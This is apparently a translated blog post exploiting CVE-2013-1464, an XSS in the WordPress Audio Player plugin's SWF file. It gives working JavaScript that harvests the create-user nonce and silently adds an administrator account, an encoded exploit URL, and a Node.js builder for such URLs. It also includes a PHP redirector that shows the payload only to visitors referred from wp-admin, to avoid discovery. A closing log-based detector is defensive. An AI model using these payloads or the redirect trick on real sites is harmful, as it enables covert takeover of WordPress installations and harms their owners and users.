[CVE-2013-1464] WordPress Audio Player Plugin XSS in SWF: exploitation
```javascript
try{
    var ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){
    var ajaxRequest = new XMLHttpRequest();
}
// First request: load wp-admin/user-new.php (as the logged-in admin) to harvest
// the _wpnonce_create-user nonce from the form. ajax2 is an alias of the same
// XHR object, reused for the second request.
ajaxRequest.open("POST", "/wp/wp-admin/user-new.php", true);
ajax2=ajaxRequest;
ajaxRequest.send(null);
ajaxRequest.onreadystatechange=function(){
    if(ajaxRequest.readyState==4){
        // The regex is greedy (.*), so split('"')[0] trims the match back to the nonce itself.
        var tosend="action=createuser&_wpnonce_create-user="+(((new RegExp(/name=\"_wpnonce_create-user\"\svalue=\"(.*)\"\s/)).exec(ajaxRequest.responseText))[1].split('"')[0])+"&_wp_http_referer=%2Fwp%2Fwp-admin%2Fuser-new.php&user_login=myusername0&email=myeamil0%40a.com&first_name=steve&last_name=aleen&url=&pass1=a123456&pass2=a123456&role=administrator&createuser=adduser";
        // Second request: submit the create-user form with the harvested nonce,
        // creating an account in the administrator role.
        ajax2.open("POST", "/wp/wp-admin/user-new.php", true);
        ajax2.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        ajax2.send(tosend);
        ajax2.onreadystatechange=function(){
            if(ajaxRequest.readyState==4){
                // Done: send the admin somewhere unrelated.
                document.location='http://www.google.com.hk'
            }
        }
    }
}
```
Merge the JS above onto one line, convert it to ASCII character codes, and execute it through eval:
```
http://www.abc.com/wp/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){eval(String.fromCharCode(116,114,121,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,34,41,59,125,99,97,116,99,104,40,101,41,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,125,97,106,97,120……,125))}//
```
This is the final exploit URL.
The main job of this JS is to add a user in the administrator role through the WordPress admin backend. Because it first has to obtain a key value from the page (the `_wpnonce_create-user` nonce that WordPress checks on the create-user form), two AJAX requests are needed: one to read the form and one to submit it.
So exploitation works like this: first lure the administrator into clicking the link; the JS then performs the add-user operation, and once the user has been added it redirects to an unrelated address.
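As an added example (not part of the original post), the pieces of the payload above in stand-alone form so they can be checked outside a browser: the nonce extraction the first XHR performs, the form body the second XHR sends, and the "one line, then String.fromCharCode inside eval" conversion described earlier. The HTML fragment and the nonce value are constructed; `buildExploitUrl` takes the injection prefix `a\"))}catch(e){` and the trailing `}//` from the URL above and assumes its `base` argument is the WordPress root (the post's `/wp`).

```javascript
// Added example, not code from the original post. Assumed: Node.js.

// Constructed fragment shaped like the nonce field on wp-admin/user-new.php.
// The nonce value is made up. The second input is deliberately placed on the
// same line so the greedy regex over-matches, which is why the payload keeps
// only the first '"'-delimited piece of the match.
const SAMPLE_USER_NEW_HTML =
  '<form method="post" name="createuser" id="createuser" class="validate">\n' +
  '<input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="a1b2c3d4e5" />' +
  '<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/user-new.php" />\n' +
  '<table class="form-table">\n';

// Same regex as the payload; returns null when the form is not present
// (for example when the request was not made as a logged-in admin).
function extractCreateUserNonce(html) {
  const m = /name=\"_wpnonce_create-user\"\svalue=\"(.*)\"\s/.exec(html);
  if (!m) return null;
  return m[1].split('"')[0];
}

// Body of the second XHR, with the field names the payload uses.
function buildCreateUserBody(nonce, opts) {
  const fields = {
    action: 'createuser',
    '_wpnonce_create-user': nonce,
    _wp_http_referer: '/wp/wp-admin/user-new.php',
    user_login: opts.login,
    email: opts.email,
    first_name: opts.first || '',
    last_name: opts.last || '',
    url: '',
    pass1: opts.password,
    pass2: opts.password,
    role: 'administrator',
    createuser: 'adduser',
  };
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
}

// Collapse the script to one line and wrap it as eval(String.fromCharCode(...)),
// so the value carried in the SWF parameter contains no quotes at all.
// Lines are joined with nothing in between, as in the post's encoding, which
// assumes every line ends at a token boundary ('{', ';', '}', '(').
function toFromCharCodeEval(js) {
  const oneLine = js.split(/\r?\n/).map((s) => s.trim()).filter(Boolean).join('');
  const codes = Array.from(oneLine, (ch) => ch.charCodeAt(0)).join(',');
  return 'eval(String.fromCharCode(' + codes + '))';
}

// Final URL in the shape shown in the post: the prefix a\" (here already
// URL-encoded as a%5C%22) closes whatever the SWF wrapped playerID in, the
// catch(e){ ... } block carries the script, and // comments out the rest.
function buildExploitUrl(base, js) {
  return base + '/wp-content/plugins/audio-player/assets/player.swf?playerID=' +
    'a%5C%22))}catch(e){' + toFromCharCodeEval(js) + '}//';
}

if (typeof require !== 'undefined' && require.main === module) {
  const nonce = extractCreateUserNonce(SAMPLE_USER_NEW_HTML);
  console.log(nonce);
  console.log(buildCreateUserBody(nonce, {
    login: 'myusername0', email: 'myeamil0@a.com',
    first: 'steve', last: 'aleen', password: 'a123456',
  }));
  console.log(buildExploitUrl('http://www.abc.com/wp', 'try{x}'));
}
```

Running it prints the nonce, the same form body the payload above builds, and an exploit URL with the post's prefix and suffix around the encoded script.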
In practice, though, a link this long left as a comment gets filtered out by WP directly. Google's or a similar URL shortener would work, but in the end, on a friend's suggestion, the approach became having a PHP file redirect back to the exploit URL. A really good idea.
Concretely: first check the Referer. If the Referer contains wp-admin, the click most likely came from an administrator, and in that case adding the user usually succeeds, so redirect to the exploit URL; otherwise redirect to an advertisement or some other unrelated page. This reduces the risk of being discovered.
The code is as follows:
```php
<html>
<head>
</head>
<body>
<?php

// Append every visitor's Referer to res.txt
$myfile="res.txt";
$fp = fopen($myfile,"a+");

$refer = $_SERVER['HTTP_REFERER'];
$towrite = "---".$refer."\n";

fwrite($fp,$towrite);
fclose( $fp );
$pos =0;
$url="";
echo "1111";
// A Referer containing wp-admin most likely means an administrator clicked the link, so redirect to the exploit URL.
if( $pos =strpos( $refer,'wp-admin' ))
{
    // Everything before "wp-admin" is the WordPress root (e.g. http://www.abc.com/wp/);
    // append the vulnerable SWF path and payload to it.
    $url = substr( $refer, 0, $pos );
    $url = $url.'wp-content/plugins/audio-player/assets/player.swf?playerID=aa%5C%22))}catch(e){eval(String.fromCharCode(116,114,121,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,34,41,59,125,99,97,116,99,104,40,101,41,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,125,97,106,97,120……,125))}//';
    echo "<script>document.location='$url'</script>";
// If the Referer does not contain "wp-admin", it is probably not the administrator, so send them off to some unrelated site
}else{
    echo "<script>document.location='http://www.someotherwebsite.com'</script>";
}
echo "OVER";
?>

</body>
</html>
```
There is actually an interesting redirect chain here. Suppose the Referer comes from www.abc.com/wp-admin/…; opening this PHP then redirects back to the exploit URL, i.e. the XSS-able Flash file under www.abc.com/wp-content. The XSS payload in turn finishes by redirecting back to this PHP (in the JS listed at the top the final `document.location` points at www.google.com.hk; for this chain it points at the PHP page instead), and this time, because the Referer is the exploit URL itself and no longer contains wp-admin, the PHP sends the browser on to an unrelated advertisement page. That is: abc.com -> PHP -> abc.com -> PHP -> otherwebsite.
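From the defender's side, as an added example that is not part of the original post: the chain above leaves two distinctive traces in the site's own access log, a request for player.swf whose playerID carries script rather than an id, and a POST to wp-admin/user-new.php whose Referer is the player.swf URL instead of the user-new.php form page. The detector below runs over constructed Apache combined-format log lines; the IPs, timestamps and host names are made up, and `attacker.example` stands in for wherever the redirecting PHP is hosted.

```javascript
// Added example, not code from the original post. Assumed: Node.js.

// Constructed log lines (Apache combined format) for one attack and two normal requests.
const SAMPLE_LOG = [
  // Normal plugin use: playerID is just an element id.
  '198.51.100.7 - - [10/Aug/2013:10:14:02 +0000] "GET /wp/wp-content/plugins/audio-player/assets/player.swf?playerID=audioplayer_1 HTTP/1.1" 200 8421 "http://www.abc.com/wp/?p=12" "Mozilla/5.0"',
  // Admin arriving via the attacker's redirect page; script in playerID.
  '203.0.113.5 - - [10/Aug/2013:10:15:32 +0000] "GET /wp/wp-content/plugins/audio-player/assets/player.swf?playerID=aa%5C%22))}catch(e){eval(String.fromCharCode(116,114,121,123))}// HTTP/1.1" 200 8421 "http://attacker.example/r.php" "Mozilla/5.0"',
  // The payload\'s XHR to user-new.php, with the SWF URL as Referer.
  '203.0.113.5 - - [10/Aug/2013:10:15:33 +0000] "POST /wp/wp-admin/user-new.php HTTP/1.1" 200 15233 "http://www.abc.com/wp/wp-content/plugins/audio-player/assets/player.swf?playerID=aa%5C%22))}catch(e){eval(String.fromCharCode(116,114,121,123))}//" "Mozilla/5.0"',
  // A legitimate admin submitting the create-user form from the form page itself.
  '198.51.100.9 - - [10/Aug/2013:11:02:10 +0000] "POST /wp/wp-admin/user-new.php HTTP/1.1" 302 0 "http://www.abc.com/wp/wp-admin/user-new.php" "Mozilla/5.0"',
];

const SWF_PATH = '/wp-content/plugins/audio-player/assets/player.swf';
// A legitimate playerID is an alphanumeric id; any of these means script.
const SCRIPT_MARKERS = /eval\(|String\.fromCharCode|catch\s*\(|[{}]|["\\]|\/\//;

// Parse one combined-format line; returns null for lines that do not match.
function parseLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: m[5], referer: m[6], ua: m[7] };
}

// Decoded playerID query value, or null if absent. decodeURIComponent throws
// on malformed %-escapes; keep the raw value then, it is still worth inspecting.
function playerIdOf(target) {
  const q = target.indexOf('?');
  if (q < 0) return null;
  for (const pair of target.slice(q + 1).split('&')) {
    const eq = pair.indexOf('=');
    const k = eq < 0 ? pair : pair.slice(0, eq);
    const v = eq < 0 ? '' : pair.slice(eq + 1);
    if (k === 'playerID') {
      try { return decodeURIComponent(v); } catch (e) { return v; }
    }
  }
  return null;
}

// Reasons a parsed entry is suspicious (empty array when it is not).
function classify(entry) {
  const reasons = [];
  if (entry.target.includes(SWF_PATH)) {
    const id = playerIdOf(entry.target);
    if (id !== null && SCRIPT_MARKERS.test(id)) reasons.push('script in playerID');
  }
  if (entry.method === 'POST' && entry.target.includes('/wp-admin/user-new.php') &&
      entry.referer.includes(SWF_PATH)) {
    reasons.push('user-new.php POST referred from player.swf');
  }
  return reasons;
}

// Flagged entries with their reasons, in log order.
function scanLog(lines) {
  return lines.map(parseLine).filter(Boolean)
    .map((e) => ({ ip: e.ip, time: e.time, target: e.target, reasons: classify(e) }))
    .filter((r) => r.reasons.length > 0);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scanLog(SAMPLE_LOG));
}
```

Against the sample, the two 203.0.113.5 entries are flagged and the two normal requests are not. The second rule is the more robust one: the playerID markers can be varied by an attacker, but a create-user POST whose Referer is a SWF under wp-content is never produced by the admin form itself.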
